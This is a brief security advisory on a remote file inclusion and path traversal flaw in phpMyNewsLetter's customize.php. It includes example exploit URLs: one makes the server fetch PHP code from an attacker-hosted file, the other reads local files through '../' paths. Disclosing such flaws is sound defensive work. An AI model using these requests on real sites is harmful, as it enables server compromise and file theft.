source: https://www.securityfocus.com/bid/5886/info
A vulnerability has been discovered in phpMyNewsLetter.

Reportedly, it is possible to pass an attacker-specified file include location to a CGI parameter of the 'customize.php' script.

This may allow an attacker to execute arbitrary commands with the privileges of the webserver.

Additionally, an attacker may exploit this problem to view local webserver-readable files.

http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World

Within http://[attacker]/code.txt:

<? echo $text; ?>

or

http://[target]/include/customize.php?l=../path/file/to/view